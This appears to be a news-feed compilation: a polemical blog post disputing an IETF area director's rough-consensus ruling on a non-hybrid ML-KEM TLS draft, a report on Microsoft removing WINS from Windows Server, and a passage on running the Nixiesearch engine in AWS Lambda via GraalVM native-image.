Normal practice in deploying post-quantum cryptography is to deploy ECC+PQ. IETF's TLS working group is standardizing ECC+PQ. But IETF management is also non-consensually ramming a particular NSA-driven document through the IETF process, a "non-hybrid" document that adds just PQ as another TLS option.

Don't worry: we're standardizing cars with seatbelts. Also, recognizing generous funding from the National Morgue Association, we're going to standardize cars without seatbelts as another option, ignoring the safety objections. That's okay, right?

Last month I posted part 1 of this story. Today's part 2 highlighted the corruption. This blog post, part 3, highlights the dodging in a particular posting at the beginning of this month by an IETF "security area director". Part 4 will give an example of how dissent on this topic has been censored.

Consensus means whatever the people in power want to do. Recall from my previous blog post that "adoption" of a document is a preliminary step before an IETF "working group" works on, and decides whether to standardize, the document. In April 2025, the chairs of the IETF TLS WG called for "adoption" of this NSA-driven document. During the call period, 20 people expressed unequivocal support for adoption, 2 people expressed conditional support for adoption, and 7 people expressed unequivocal opposition to adoption. ( Details for verification. )

The chairs claimed that "we have consensus to adopt this draft". I promptly asked for explanation .

Before the chairs could even reply, an "area director" interrupted , claiming, inter alia, the following: "There is clearly consensus based on the 67 responses to the adoption call. ... The vast majority was in favour of adoption ... There were a few dissenting opinions".

After these lies by the "area director" were debunked , the chairs said that they had declared consensus "because there is clearly sufficient interest to work on this draft" specifically "enough people willing to review the draft".

I can understand not everybody being familiar with the specific definition of "consensus" that antitrust law requires standards-development organizations to follow. But it's astonishing to see chairs substituting a consensus-evaluation procedure that simply ignores objections.

Stonewalling. The chairs said I could escalate. IETF procedures say that an unresolved dispute can be brought "to the attention of the Area Director(s) for the area in which the Working Group is chartered", and then "The Area Director(s) shall attempt to resolve the dispute".

I filed a complaint with the "security area directors" in early June 2025 . One of them never replied. The other, the same one who had claimed that there was "clearly consensus", sent a series of excuses for not handling the complaint. For example, one excuse was that the PDF format "discourages participation".

Do IETF procedures say "The Area Director(s) shall attempt to resolve the dispute unless the dispute is documented in a PDF"? No.

I sent email two days later systematically addressing the excuses. The "area director" never replied.

It isn't clear under IETF procedures whether a non-reply allows an appeal. It is, however, clear that an appeal can't be filed after two months. I escalated to the "Internet Engineering Steering Group" (IESG) in August 2025 .

(These aren't even marginally independent groups. The "area directors" are the IESG members. IESG appoints the WG chairs.)

IESG didn't reply until October 2025. It rejected one of the "Area Director" excuses for having ignored my complaint, but endorsed another excuse. I promptly filed a revised complaint with the "area director", jumping through the hoops that IESG had set. There were then further runarounds .

The switch. Suddenly, on 1 November 2025, IESG publicly instructed the "area director" to address the following question: "Was rough consensus to adopt draft-connolly-tls-mlkem-key-agreement in the TLS Working Group appropriately called by the WG chairs?"

The "area director" posted his conclusion mere hours later: "I agree with the TLS WG Chairs that the Adoption Call result was that there was rough consensus to adopt the document".

Dodging procedural objections. Before looking at how the "area director" argued for this conclusion, I'd like to emphasize three things that the "area director" didn't do.

First, did the "area director" address my complaint about the chair action on this topic? No.

One reason this matters is that the law requires standards-development organizations to provide an "appeals process" . Structurally, the "area director" isn't quoting and answering the points in my complaint; the "area director" puts the entire burden on the reader to try to figure out what's supposedly answering what, and to realize that many points remain unanswered.

Second, did the "area director" address the chairs claiming that "we have consensus to adopt this draft"? Or the previous claim from the "area director" that there was "clearly consensus"? No. Instead IESG and this "area director" quietly shifted from "consensus" to "rough consensus". (Did you notice this shift when I quoted IESG's "rough consensus" instruction?)

One reason this matters is that "consensus" is another of the legal requirements for standards-development organizations. The law doesn't allow "rough consensus". Also, IETF claims that "decision-making requires achieving broad consensus" . "broad consensus" is even stronger than "consensus", since it's saying that there's consensus in a broad group .

Third, the way that my complaint had established the lack of consensus was, first, by reviewing the general definition of "consensus" (which I paraphrased from the definition in the law, omitting a citation only because the TLS chairs had threatened me with a list ban if I mentioned the law again), and then applying the components of that definition to the situation at hand. Did the area director follow this structure? Here's the definition of "consensus", or "rough consensus" if we're switching to that, and now let's apply that definition? No. Nobody reading this message from the "area director" can figure out what the "area director" believes these words mean.

Wow, look at that: "due process" is another of the legal requirements for standards-development organizations. Part of due process is simply making clear what procedures are being applied . Could it possibly be that the people writing the law were thinking through how standardization processes could be abused?

Numbers. Without further ado, let's look at what the "security area director" did write.

The IESG has requested that I evaluate the WG Adoption call results for ML-KEM Post-Quantum Key Agreement for TLS 1.3 (draft-connolly-tls-mlkem-key-agreement). Please see below.

As noted above, IESG had instructed the "area director" to answer the following question: "Was rough consensus to adopt draft-connolly-tls-mlkem-key-agreement in the TLS Working Group appropriately called by the WG chairs?"

Side note: Given that the "area director" posted all of the following on the same day that IESG instructed the "area director" to write this, presumably this was all written in advance and coordinated with the rest of IESG. I guess the real point of finally (on 1 November 2025) addressing the adoption decision (from 15 April 2025) was to try to provide cover for the "last call" a few days later (5 November 2025).

ExecSum


I agree with the TLS WG Chairs that the Adoption Call result was that there was rough consensus to adopt the document.

As noted above, the TLS WG chairs had claimed "consensus", and the "area director" had claimed that there was "clearly consensus". The "area director" is now quietly shifting to a weaker claim.

Timeline


April 1: Sean and Joe announce WG Adoption Call [ about 40 messages sent in the thread ]

"About 40"? What happened to the "area director" previously writing "There is clearly consensus based on the 67 responses to the adoption call"? And why is the number of messages supposed to matter in the first place?

April 15: Sean announces the Adoption Call passed. [ another 50 messages are sent in the thread ]

Messages after the specified adoption-call deadline can't justify the claim that "the Adoption Call result was that there was rough consensus to adopt the document". The adoption call failed to reach consensus.

April 18 to today: A chain of (attempted) Appeals by D. J. Bernstein to the AD(s), IESG and IAB, parts of which are still in process.

The fact that the ADs and IESG stonewalled in response to complaints doesn't mean that they were "attempted" complaints.

Outcome


30 people participated in the consensus call, 23 were in favour of adoption, 6 against and 1 ambivalent (names included at the bottom of this email).

These numbers are much closer to reality than the "area director" previously writing "There is clearly consensus based on the 67 responses to the adoption call. ... The vast majority was in favour of adoption ... There were a few dissenting opinions".

Also, given that the "area director" is continually making claims that aren't true (see examples below) and seems generally allergic to providing evidence (the text I'm quoting below has, amazingly, zero URLs), it's a relief to see the "area director" providing names to back up the claimed numbers here.

But somehow, even after being caught lying about the numbers before, the "area director" still can't resist shading the numbers a bit.

The actual numbers were 20 people unequivocally supporting adoption, 2 people conditionally supporting adoption, and 7 people unequivocally opposing adoption. Clearly 7 is close to 6, and 20+2 is close to 23, but, hmmm, not exactly. Let's check the details:

  • How does the "area director" end up with 6 negative votes rather than 7? By falsely listing Thomas Bellebaum as "ambivalent" and falsely attributing a "prefer not, but okay if we do" position to Bellebaum. In fact, Bellbaum had written "I agree with Stephen on this one and would not support adoption of non-hybrids." (This was in reply to Stephen Farrell, who had written "I'm opposed to adoption, at this time.")

  • How does the "area director" end up with 23 positive votes rather than 22? By falsely listing the document author (Deirdre Connolly) as having stated a pro-adoption position during the call. The "area director" seems generally clueless about conflict-of-interest issues and probably doesn't find it obvious that an author shouldn't vote, but the simple fact is that the author didn't vote. She sent three messages during the call period; all of those messages are merely commenting on specific points, not casting a vote on the adoption question.

The document author didn't object to the "area director" fudging the numbers. Bellebaum did politely object ; the "area director" didn't argue , beyond trying to save face with comments such as "Thanks for the clarification".

More to the point, the "area director" has never explained whether or how the tallies of positive and negative votes are supposed to be relevant to the "rough consensus" claim. The "area director" also hasn't commented on IETF saying that IETF doesn't make decisions by voting.

Bogus arguments for the draft. I mentioned in my previous blog post that IETF claims that "IETF participants use their best engineering judgment to find the best solution for the whole Internet, not just the best solution for any particular network, technology, vendor, or user".

In favour argument summary

While there is a lack of substantiating why adoption is desired - which is typical

Okay, the "area director" seems to have some basic awareness that this document flunks the "engineering judgment" criterion. The "area director" tries to defend this by saying that other documents flunk too. So confidence-inspiring!

- the big use case seems to be to support those parties relying on NIST and FIPS for their security requirements.

Wrong. Anything+PQ, and in particular ECC+PQ, complies with NIST's standards when the PQ part does. See NIST SP 800-227 : "This publication approves the use of the key combiner (14) for any t > 1 if at least one shared secret (i.e., S j for some j) is generated from the key-establishment methods in SP 800-56A [1] or SP 800-56B [2] or an approved KEM." For example, if the PQ part is ML-KEM as per FIPS 203, then NIST allows ECC+PQ too.

What's next: claiming that using PQ in an Internet protocol would violate NIST standards unless NIST has standardized that particular Internet protocol?

This encompasses much more than just the US government as other certification bodies and other national governments have come to rely on the outcome of the NIST competition, which was the only public multi-year post-quantum cryptography effort to evaluate the security of proposed new post-quantum algorithms.

I won't bother addressing the errors here, since the bottom-line claim is orthogonal to the issue at hand. The TLS WG already has an ECC+PQ document using NIST-approved PQ; the question is whether to also have a document allowing the ECC seatbelt to be removed.

It was also argued pure PQ has less complexity.

You know what would be even less complicated? Encrypting with the null cipher!

There was a claim that PQ is less complex than ECC+PQ. There was no response to Andrey Jivsov objecting that having a PQ option makes the ecosystem more complicated. The basic error in the PQ-less-complex claim is that it ignores ECC+PQ already being there.

How the "area director" described the objections.

Opposed argument summary

Most of the arguments against adoption are focused on the fact that a failsafe is better than no failsafe, irrespective of which post-quantum algorithm is used,

This is the closest that the "area director" comes to acknowledging the central security argument for ECC+PQ. Of course, the "area director" spends as little time as possible on security. Compare this to my own objection to adoption, which started with SIKE as a concrete example of the dangers and continued with "SIKE is not an isolated example: https://cr.yp.to/papers.html#qrcsp shows that 48% of the 69 round-1 submissions to the NIST competition have been broken by now".

and that the practical costs for hybrids are negligible.

Hmmm. By listing this as part of an "opposed argument summary", is the "area director" suggesting that this was disputed? When and where was the dispute?

As noted above, I've seen unquantified NSA/GCHQ fearmongering about costs , but that was outside IETF. If NSA and GCHQ tried the same arguments on a public mailing list then they'd end up being faced with questions that they can't answer.

It was also argued that having an RFC gives too much promotion or sense of approval to a not recommended algorithm.

When I wrote my own summary of the objections , I provided a quote and link for each point. The "area director" doesn't do this. If the "area director" is accurately presenting an argument that was raised, why not provide a quote and a link? Is the "area director" misrepresenting the argument? Making up a strawman? The reader can't tell.

I have expanded some of the arguments and my interpretation of the weight of these below.

This comment about "weight" is revealing. What we'll see again and again is that the "area director" is expressing the weight that he places on each argument (within the arguments selected and phrased by the "area director"), i.e., the extent to which he is convinced or not convinced by those arguments.

Given that IESG has power under IETF rules to unilaterally block publications approved by WGs, it's unsurprising that the "area directors", in their roles as IESG members, will end up evaluating the merits of WG-approved documents. But that isn't what this "area director" was instructed to do here . There isn't a WG-approved document at this point. Instead the "area director" was instructed to evaluate whether the chairs "appropriately" called "rough consensus" to "adopt" the document. The "area director" is supposed to be evaluating procedurally what the WG decision-makers did. Instead the "area director" is putting his thumb on the scale in favor of the document.

Incompetent risk management.

Non-hybrid as "basic flaw"

The argument by some opponents that non-hybrids are a "basic flaw" seems to miscategorize what a "basic flaw" is. There is currently no known "basic flaw" against MLKEM.

I think that the "area director" is trying to make some sort of claim here about ML-KEM not having been attacked, but the wording is so unclear as to be unevaluatable. Why doesn't KyberSlash count? How about Clangover ? How about the continuing advances in lattice attacks that have already reduced ML-KEM below its claimed security targets, the most recent news being from last month ?

More importantly, claiming that ML-KEM isn't "known" to have problems is utterly failing to address the point of the ECC seatbelt. It's like saying "This car hasn't crashed, so the absence of seatbelts isn't a basic flaw".

As was raised, it is rather odd to be arguing we must immediately move to use post-quantum algorithms while at the same time argue these might contain fundamental basic flaws.

Here the "area director" is reasonably capturing a statement from one document proponent (original wording: "I find it to be cognitive dissonance to simultaneously argue that the quantum threat requires immediate work, and yet we are also somehow uncertain of if the algorithms are totally broken. Both cannot be true at the same time").

But I promptly followed up explaining the error: "Rolling out PQ is trying to reduce the damage from an attacker having a quantum computer within the security lifetime of the user data. Doing that as ECC+PQ instead of just PQ is trying to reduce the damage in case the PQ part is broken. These actions are compatible, so how exactly do you believe they're contradictory?"

There was, of course, no reply at the time. The "area director" now simply repeats the erroneous argument.

As TLS (or IETF) is not phasing out all non-hybrid classics,

"Non-hybrid classics" is weird terminology. Sometimes pre-quantum algorithms (ECC, RSA, etc.) are called "classical", so I guess the claim here is that using just ECC in TLS isn't being phased out. That's a bizarre claim. There are intensive efforts to roll out ECC+PQ in TLS to try to protect against quantum computers. Cloudflare reports the usage of post-quantum cryptography having risen to about 50% of all browsers that it sees (compared to 20% a year ago); within those connections, 95% use ECC+MLKEM768 and 5% use ECC+Kyber768.

The "area director" also gives no explanation of why the "not phasing out" claim is supposed to be relevant here.

I find this argument not strong enough

See how the "area director" is saying the weight that the "area director" places on each argument (within the arguments selected and phrased by the "area director"), rather than evaluating whether there was consensus to adopt the document?

to override the consensus of allowing non-hybrid standards from being defined

Circular argument. There wasn't consensus to adopt the document in the first place.

especially in light of the strong consensus for marking these as "not recommended".

I think many readers will be baffled by this comment. If something is "not recommended", wouldn't that be an argument against standardizing it, rather than an argument for standardizing it?

The answer is that "not recommended" doesn't mean what you think it means: the "area director" is resorting to confusing jargon. I don't think there's any point getting into the weeds on this.

Incompetent planning for the future.

Non-hybrids are a future end goal

Additionally, since if/when we do end up in an era with a CRQC, we are ultimately designing for a world where the classic components offer less to no value.

If someone is trying to argue for removing ECC, there's a big difference between the plausible scenario of ECC having "less" value and the extreme scenario of ECC having "no" value. It's wrong for the "area director" to be conflating these possibilities.

As I put it almost two years ago : "Concretely, think about a demo showing that spending a billion dollars on quantum computation can break a thousand X25519 keys. Yikes! We should be aiming for much higher security than that! We don't even want a billion-dollar attack to be able to break one key! Users who care about the security of their data will be happy that we deployed post-quantum cryptography. But are the users going to say 'Let's turn off X25519 and make each session a million dollars cheaper to attack'? I'm skeptical. I think users will need to see much cheaper attacks before agreeing that X25519 has negligible security value."

Furthermore, let's think for a moment about the idea that one will eventually want to transition to just ML-KEM , the specific proposal that the "area director" is portraying as the future. Here are three ways that this can easily be wrong:

  • Maybe ML-KEM's implementation issues end up convincing the community to shift to a more robust option, analogously to what happened with ECC .

  • Maybe the advances in public attacks continue to the point of breaking ML-KEM outright.

  • Maybe the cliff stops crumbling and ML-KEM survives, but more efficient options also survive. At this point there are quite a few options more efficient than ML-KEM. (Random example: SMAUG . The current SMAUG software isn't as fast as the ML-KEM software, but this is outweighed by SMAUG using less network traffic than ML-KEM.) Probably some options will be broken, but ML-KEM would have to be remarkably lucky to end up as the most efficient remaining option.

Does this "area director" think that all of the more efficient options are going to be broken, while ML-KEM won't? Sounds absurdly overconfident. More likely is that the "area director" doesn't even realize that there are more efficient options. For anyone thinking "presumably those newer options have received less scrutiny than ML-KEM": we're talking about what to do long-term, remember?

Taking ML-KEM as the PQ component of ECC+PQ is working for getting something rolled out now. Hopefully ML-KEM will turn out to not be a security disaster (or a patent disaster). But, for guessing what will be best to do in 5 or 10 or 15 years, picking ML-KEM is premature.

When and where to exactly draw the line of still using a classic component safeguard is speculation at best.

Here the "area director" is clearly attacking a strawman.

Already supporting pure post quantum algorithms now to gain experience

How is rolling out PQ supposed to be gaining experience that isn't gained from the current rollout of ECC+PQ?

Also, I think it's important to call out the word "pure" here as incoherent, indefensible marketing. What we're actually talking about isn't modifying ML-KEM in any way; it's simply hashing the ML-KEM session key together with other inputs. Is ML-KEM no longer "pure" when it's plugged into TLS, which also hashes session keys? (The word "pure" also showed up in a few of the earlier quotes.)

while not recommending it at this time seems a valid strategy for the future, allowing people and organizations their own timeline of deciding when/if to go from hybrid to pure PQ.

Here we again see the area director making a decision to support the document , rather than evaluating whether there was consensus in the WG to adopt the document.

Again getting the complexity evaluation backwards.

Added complexity of hybrids

There was some discussion on whether or not hybrids add more complexity, and thus add risk, compared to non-hybrids. While arguments were made that proper classic algorithms add only a trivial amount of extra resources, it was also pointed out that there is a cost of implementation, deployment and maintenance.

Here the "area director" is again making the same mistake explained earlier: ignoring the fact that ECC+PQ is already there, and thus getting the complexity evaluation backwards.

The "thus add risk" logic is also wrong. Again, all of these options are more complex than the null cipher.

Additionally, the existence of draft-ietf-tls-hybrid-design and the extensive discussions around "chempat" vs "xwing" vs "kitchensink" shows that there is at least some complexity that is added by the hybrid solutions.

No, the details of how to combine ECC with PQ in TLS are already settled and deployed.

Looking beyond TLS: Chempat hashes the transcript (similarly to TLS), making it robust for a wide range of protocols. The other options add fragility by hashing less for the sake of minor cost savings. Each of these options is under 10 lines of code. The "area director" exaggerates the complexity by mentioning "extensive discussions", and spends much more effort hyping this complexity as a risk than acknowledging the risks of further PQ attacks.

Anyway, it's not as if the presence of this document has eliminated the discussions of ECC+PQ details, nor is there any credible mechanism by which it could do so. Again, the actual choice at hand is whether to have PQ as an option alongside ECC+PQ. Adding that option adds complexity. The "area director" is getting the complexity comparison backwards by instead comparing (1) PQ in isolation to (2) ECC+PQ in isolation.

Botching the evaluation of human factors.

RFCs being interpreted as IETF recommendation

It seems there is disagreement about whether the existence of an RFC itself qualifies as the IETF defacto "recommending" this in the view of IETF outsiders/ implemeners whom do not take into account any IANA registry RECOMMENDED setting or the Mandatory-To-Implement (MTI) reommendations.

I would expect a purchasing manager to have instructions along the lines of "Buy only products complying with the standards", and to never see IETF's confusing jumble of further designations.

This is an area where we recently found out there is little consensus on an IETF wide crypto policy statement via an RFC. The decision on whether an RFC adds value to a Code Point should therefor be taken independently of any such notion of how outsiders might interpret the existence of an RFC.

From a security perspective, it's a big mistake to ignore the human factor, such as the impact of a purchasing manager saying "This is the most efficient standard so I'll pick that".

In this case, while Section 3 could be considered informative, I believe Section 4 and Section 5 are useful (normative) content that assists implementers.

Is this supposed to have something to do with the consensus question?

And people have proposed extending the Security Considerations to more clearly state that this algorithm is not recommended at this point in time. Without an RFC, these recommendations cannot be published by the IETF in a way that implementers would be known to consume.

Ah, yes, "known to consume"! There was, um, one of those, uh, studies showing the details of, um, how implementors use RFCs, which, uh, showed that 100% of the implementors diligently consumed the warnings in the RFCs. Yeah, that's the ticket. I'm sure the URL for this study is sitting around here somewhere.

Let's get back to the real world. Even if an implementor does see a "This document is a bad idea" warning, this simply doesn't matter when the implementors are chasing contracts issued by purchasing managers who simply care what's standardized and haven't seen the warning.

It's much smarter for the document to (1) eliminate making the proposal that it's warning about and (2) focus, starting in the title, on saying why such proposals are bad. This makes people more likely to see the warning, and at the same time it removes the core problem of the bad proposal being standardized.

Fictions regarding country actions.

Say no to Nation State algorithms

The history and birth of MLKEM from Kyber through a competition of the international Cryptographic Community, organized through US NIST can hardly be called or compared to unilateral dictated nation state algorithm selection.

NIST repeatedly refused to designate the "NIST Post-Quantum Cryptography Standardization Process" as a "competition". It even wrote that the process "should not be treated as a competition".

Certainly there were competition-like aspects to the process. I tend to refer to it as a competition. But in the end the selection of algorithms to standardize was made by NIST, with input behind the scenes from NSA .

There has been no other comparable public effort to gather cryptographers and publicly discuss post-quantum crypto candidates in a multi-years effort.

Nonsense. The premier multi-year effort by cryptographers to "publicly discuss post-quantum crypto candidates" is the cryptographic literature.

In fact, other nation states are heavily relying on the results produced by this competition.

Here's the objection from Stephen Farrell that the "area director" isn't quoting or linking to: "I don't see what criteria we might use in adopting this that wouldn't leave the WG open to accusations of favouritism if we don't adopt other pure PQ national standards that will certainly arise".

After reading this objection, you can see how the "area director" is sort of responding to it by suggesting that everybody is following NIST (i.e., that the "certainly arise" part is wrong).

But that's not true. NIST's selections are controversial. For example, ISO is considering not just ML-KEM but also

  • Classic McEliece, where NIST has said it's waiting for ISO ("After the ISO standardization process has been completed, NIST may consider developing a standard for Classic McEliece based on the ISO standard"), and

  • FrodoKEM, which NIST said "will not be considered further for standardization".

ISO is also now considering NTRU, where the advertisement includes "All patents related to NTRU have expired" (very different from the ML-KEM situation).

BSI, which sets cryptographic standards for Germany, recommends not just ML-KEM but also FrodoKEM (which it describes as "more conservative" than ML-KEM) and Classic McEliece ("conservative and very thoroughly analysed"). Meanwhile China has called for submissions of new post-quantum proposals for standardization.

I could keep going, but this is enough evidence to show that Farrell's prediction was correct; the "area director" is once again wrong.

The use of MLKEM in the IETF will not set a precedent for having to accept other nation state cryptography.

Notice how the "area director" is dodging Farrell's point. If NSA can pressure the TLS WG into standardizing non-hybrid ML-KEM, why can't China pressure the TLS WG into standardizing something China wants? What criteria will IETF use to answer this question without leaving the WG "open to accusations of favouritism"? If you want people to believe that it isn't about the money then you need a really convincing alternative story.

Denouement.

Not recommending pure PQ right now

There was a strong consensus that pure PQ should not be recommended at this time, which is reflected in the document. There was some discussion on RECOMMENDED N vs D, which is something that can be discussed in the WG during the document's lifecycle before WGLC. It was further argued that adopting and publishing this document gives the WG control over the accompanying warning text, such as Security Considerations, that can reflect the current consensus of not recommending pure MLKEM over hybrid at publication time.

This is just rehashing earlier text, even if the detailed wording is a bit different.

Conclusion


The pure MLKEM code points exist.

Irrelevant. The question is whether they're being standardized.

An international market segment that wants to use pure MLKEM exists

"International"? Like Swedish company Ericsson setting up its "Ericsson Federal Technologies Group" in 2024 to receive U.S. military contracts?

as can be seen by the consensus call outcome

Um, how?

along with existing implementations of the draft on mainstream devices and software.

Yes, NSA waving around money has convinced some corporations to provide software. How is this supposed to justify the claim that "there was rough consensus to adopt the document"?

There is a rough consensus to adopt the document

Repeating a claim doesn't make it true.

with a strong consensus for RECOMMENDED N and not MTI, which is reflected in the draft.

Irrelevant. What matters is whether the document is standardized.

The reasons to not publish MLKEM as an RFC seem more based on personal opinions of risk and trust not shared amongst all participants as facts.

This sort of dismissal might be more convincing if it were coming from someone providing more URLs and fewer easily debunked claims. But it's in any case not addressing the consensus question.

Based on the above, I believe the WG Chairs made the correct call that there was rough consensus for adopting draft-connolly-tls-mlkem-key-agreement

The chairs claimed that "we have consensus to adopt this draft" (based on claiming that "there were enough people willing to review the draft", never mind the number of objections). That claim is wrong. The call for adoption failed to reach consensus.

The "area director" claimed that "There is clearly consensus based on the 67 responses to the adoption call. ... The vast majority was in favour of adoption ... There were a few dissenting opinions". These statements still haven't been retracted; they were and are outright lies about what happened. Again, the actual tallies were 20 people unequivocally supporting adoption, 2 people conditionally supporting adoption, and 7 people unequivocally opposing adoption.

Without admitting error, the "area director" has retreated to a claim of "rough consensus". The mishmash of ad-hoc comments from the "area director" certainly doesn't demonstrate any coherent meaning of "rough consensus".

It's fascinating that IETF's advertising to the public claims that IETF's "decision-making requires achieving broad consensus", but IETF's WG procedures allow controversial documents to be pushed through on the basis of "rough consensus". To be clear, that's only if the "area director" approves of the documents, as you can see from the same "area director" issuing yet another mishmash of ad-hoc comments to overturn a separate chair decision in September 2025.

You would think that the WG procedures would define "rough consensus". They don't. All they say is that "51% of the working group does not qualify as 'rough consensus' and 99% is better than rough", not even making clear whether 51% of voters within a larger working group can qualify. This leaves a vast range of ambiguous intermediate cases up to the people in power.


Version: This is version 2025.11.23 of the 20251123-dodging.html web page.

Microsoft to remove WINS support after Windows Server 2025

Bleeping Computer
www.bleepingcomputer.com
2025-11-24 11:47:01
Microsoft has warned IT administrators to prepare for the removal of Windows Internet Name Service (WINS) from Windows Server releases starting in November 2034. [...]...
Original Article

Windows Server

Microsoft has warned IT administrators to prepare for the removal of Windows Internet Name Service (WINS) from Windows Server releases starting in November 2034.

The legacy WINS computer name registration and resolution service has been deprecated with the release of Windows Server 2022 in August 2021, when Microsoft stopped active development and working on new features.

Windows Server 2025 will be the final Long-Term Servicing Channel release to come with WINS support, with the feature to be removed from future releases.

Wiz

"WINS was officially deprecated since Windows Server 2022 and will be removed from all Windows Server releases following Windows Server 2025," Microsoft announced on Friday.

"Standard support will continue through the lifecycle of Windows Server 2025, until November 2034. We encourage you to migrate to modern Domain Name System (DNS)-based name resolution solutions before then."

Once removal takes effect, Windows Server will no longer include the WINS server role, the WINS management console snap-in, the WINS automation APIs, and related interfaces.

Microsoft highlighted several reasons for eliminating WINS support, including DNS's superior scalability and compliance with modern internet standards, and it noted that DNSSEC provides security protections against cache poisoning and spoofing attacks that WINS/NetBIOS cannot mitigate.

It also added that modern Microsoft services, including Active Directory, cloud platforms, and Windows APIs, rely on DNS for name resolution.

Organizations still dependent on WINS are advised to immediately begin auditing services and applications that still rely on NetBIOS name resolution and migrate to DNS with conditional forwarders, split-brain DNS, or search suffix lists to replace WINS functionality.

Microsoft also cautioned against temporary workarounds such as static host files, saying they don't scale and aren't sustainable for enterprise environments.

"Now is the time to review dependencies, evaluate DNS migration plans, and make informed decisions," Microsoft noted.

"Organizations relying on WINS for NetBIOS name resolution are strongly encouraged to begin migration planning immediately to avoid disruptions."

Wiz

7 Security Best Practices for MCP

As MCP (Model Context Protocol) becomes the standard for connecting LLMs to tools and data, security teams are moving fast to keep these new services safe.

This free cheat sheet outlines 7 best practices you can start using today.

I put a search engine into a Lambda, so you only pay when you search

Lobsters
nixiesearch.substack.com
2025-11-24 11:44:46
Comments...
Original Article

Modern serverless search is just an accounting trick. There’s a hidden pool of nodes behind the API, and the final bill is split evenly among all clients. There’s always a standby warm node waiting for your request - you just don’t see it.

And you can’t get rid of it because scaling search engines is HARD (or at least search vendors want you to think so). You can’t just put one into a Lambda function. But what if you actually can?

As someone who has hated Elasticsearch since version 0.89 (but still uses it), there are three major blockers to running it in a truly serverless mode:

  • Container size : It’s around 700MB in version 9.x. The bigger the container, the slower the node startup, since it has to be pulled from somewhere.

  • Container startup time : For ES 9.x, the startup time alone is about 40 seconds. And the time-to-performance is much worse, since a cold JVM is painfully slow until it sees some traffic.

  • Index and state : Search engines like Elastic and Qdrant behave like databases, with each node hosting a fraction of the total cluster state. When a new node joins, the cluster needs to rebalance. What happens if you scale-to-zero? Better not ask.

We’re going to take my pet-project-gone-big search engine, Nixiesearch , and squeeze it into an AWS Lambda :

  • It’s also JVM-based, since it uses Apache Lucene for all search-related internals (Like OpenSearch, Elasticsearch and SOLR). We’re going to build a native x86_64 binary with GraalVM native-image : this should reduce the Docker image size (no JVM!) and eliminate JVM warmup entirely.

  • Can we store an index outside the search engine? Can we achieve reasonable latency with AWS S3 ? What if we host the index on AWS EFS instead?

You may wonder why do we ever need to perform weird AWS Lambda tricks when we can just keep the status quo with warm stand-by nodes? No warm-up, no cold-start, no obscure limits - it’s a good traditional approach.

Because doing weird stupid things is the way I learn. So the challenge is to have a proof-of-concept which:

  • Has minimal startup time , so scale up-down won’t be an issue. With sub-second startup you can even scale to zero when there’s no traffic!

  • Search latency is going to be reasonably fast . Yes modern search engines compete on 3 vs 5 milliseconds, but in practice you also have an chonky embedding model, which adds extra 300-400ms latency on top.

Java AOT compilation and remote index storage, sounds easy.

GraalVM native-image is an Ahead-Of-Time compiler: it takes a JVM application JAR file and builds an almost zero-dependency native binary that depends only on glibc . It sounds fancy in theory, but in practice not all applications can be statically compiled that easily.

Accessing field reflectively in Java. If you do this, you probably doing something wrong.

If you (or your transitive dependencies) use reflection to do something dynamic like enumerating class fields or loading classes dynamically, then GraalVM requires you to create a reflection-config.json file listing all the nasty things you do.

Example of reflect-config.json

Building such a file manually for all transitive dependencies is practically impossible. But in modern GraalVM versions you can attach a tracing agent to your application, which records all the nasty things happening throughout the entire codebase.

java -agentlib:native-image-agent -jar nixiesearch.jar standalone

The tracing agent needs to observe all execution paths in your application, and instead of sending all possible search requests manually, I just attached it to the test suite — and got a monumental reachability-metadata.json file that hopefully covers all reflection usage in transitive dependencies.

It’s time to build our first native binary!

A real native-image command-line.

It takes around two minutes on my 16-core AMD Zen 5 CPU to compile the binary, which is impressively slow. With an ubuntu:24.04 minimal base image we get 338MB — a nice reduction from 760MB.

But can we get rid of the 90MB base Ubuntu image and go with Alpine? Yes, but it requires building Nixiesearch with Musl instead of Glibc . Luckily as the build is dockerized, you can replace the ghcr.io/graalvm/native-image-community:25 with ghcr.io/graalvm/native-image-community:25-muslib and get a nice musl-based build env.

native-image --libc=musl -jar nixiesearch.jar <options>

The musl-based binary ends up at the same 244MB , but now it can run natively on Alpine without the gcompat glibc layer. But can we go even further and build the app completely statically, without linking libc at all? Once you start trimming dependencies, it’s hard to stop.

native-image --static --libc=musl -jar nixiesearch.jar <options>

Now we’re at 248MB , but we no longer need a base system at all - which gives us the most perfect Docker image ever:

FROM scratch
COPY --from=builder /build/nixiesearch /nixiesearch
ENTRYPOINT /nixiesearch

We could go even further and enable the -Os option to optimize for size, but I’m afraid it might impact request processing performance.

How I went from 760MB docker image to just 205MB.

GraalVM also notes that almost 30% of the codebase is taken up by the AWS Java SDK with its massive dependency footprint, so the next step is switching to the raw S3 REST API instead of the nice SDK helpers.

I originally thought that AWS Lambda runtime for Docker is just a simple “docker pull” and “docker run” on each request, but it’s slightly more complex :

Lambda API request lifecycle.
  1. On initial code deployment, the container gets fetched from ECR, unpacked and cached on all AWS AZ where your lambda is scheduled to run.

  2. When first request arrives, the container goes in to the Init stage : it gets executed on a minimal Firecracker VM. The Lambda runtime waits until started container polls runtime API for the actual request to process. This stage is billed, so we need to be as fast as possible here.

  3. Request stage : container polls runtime API for request and produces the response. This is where the actual work happens, and this is the part you’re also billed for.

  4. And here the MAGICAL Freeze stage : After the Lambda API receives a response and sees that the app starts polling for the next request, the VM gets frozen. It’s still a VM, but with zero CPU and its RAM offloaded to disk. You pay zero for a container in the freeze stage.

  5. When there’s a new request arrives, container VM gets into Thaw stage : unfrozen, processes the next request and so on to get frozen again.

  6. When there are no requests arriving for a longer period of time (in practice 5-15 minutes), lambda container gets destroyed.

Cold request (full init):

  Duration: 84.15 ms
  Billed Duration: 535 ms
  Memory Size: 3008 MB
  Max Memory Used: 133 MB
  Init Duration: 449.85 ms	

Warm request (after freeze-thaw cycle):

  Duration: 2.62 ms
  Billed Duration: 3 ms
  Memory Size: 3008 MB
  Max Memory Used: 194 MB	

That’s nice: we were able to spin the cold container in only 449ms , and warm no-op requests are just 3ms!

But note that AWS Lambda compute is very limited:

  • RAM : 128MB default with up to 3008MB max. You can submit a support ticket to get 10GB RAM, but I was too lazy to argue with AWS support.

  • vCPU : 1 vCPU, and if you go beyond 1536MB of RAM, you get 2nd vCPU. Not much.

  • Disk : up to 10GB of instance storage.

And last but not the least, S3 read throughput depends on RAM size:

S3 throughput data is well aligned with known S3 throughput limits for AWS EC2 instances . Assuming that we have only 2 vCPU max, 100MB/s is the best you can expect - which is not nice considering that to run search we need to access the index.

